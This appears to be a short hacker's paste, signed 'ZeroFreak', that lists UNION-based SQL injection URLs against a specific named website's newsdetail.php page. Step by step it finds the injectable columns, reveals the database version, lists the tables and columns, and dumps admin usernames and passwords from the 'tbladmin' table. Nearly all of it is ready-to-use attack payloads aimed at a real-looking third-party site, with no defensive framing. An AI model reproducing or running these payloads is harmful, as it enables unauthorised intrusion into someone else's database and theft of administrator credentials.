SQL Queries

1. To find the vulnerable columns
2.  
3. http://www.leadacidbatteryinfo.org/newsdetail.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,11--
4.  
5. To find the version of the database:
6. http://www.leadacidbatteryinfo.org/newsdetail.php?id=null+union+select+1,2,3,4,5,6,7,@@version,9,10,11--
7.  
8.  
9. To find the tables according the vulnerable column of your choice:
10. http://www.leadacidbatteryinfo.org/newsdetail.php?id=null+union+select+1,2,3,4,5,6,7,group_concat(table_name,0x0a),9,10,11 from information_schema.tables where table_schema=database()--
11.  
12. To find columns for the table you choose ( in this case we choose "tbladmin", so we convert it to hex and add 0x in the beginning of the hex code):
13. http://www.leadacidbatteryinfo.org/newsdetail.php?id=null+union+select+1,2,3,4,5,6,7,group_concat(column_name,0x0a),9,10,11 from information_schema.columns where table_name=0x74626c61646d696e--
14.  
15. To get the details from the column (in this case username and password):
16. http://www.leadacidbatteryinfo.org/newsdetail.php?id=null+union+select+1,2,3,4,5,6,7,group_concat(username,0x3a,password),9,10,11 from tbladmin--
17.  
18.  
19. Good luck
20. >ZeroFreak<
21.  
22.  
23.  
24.  
25.  
26.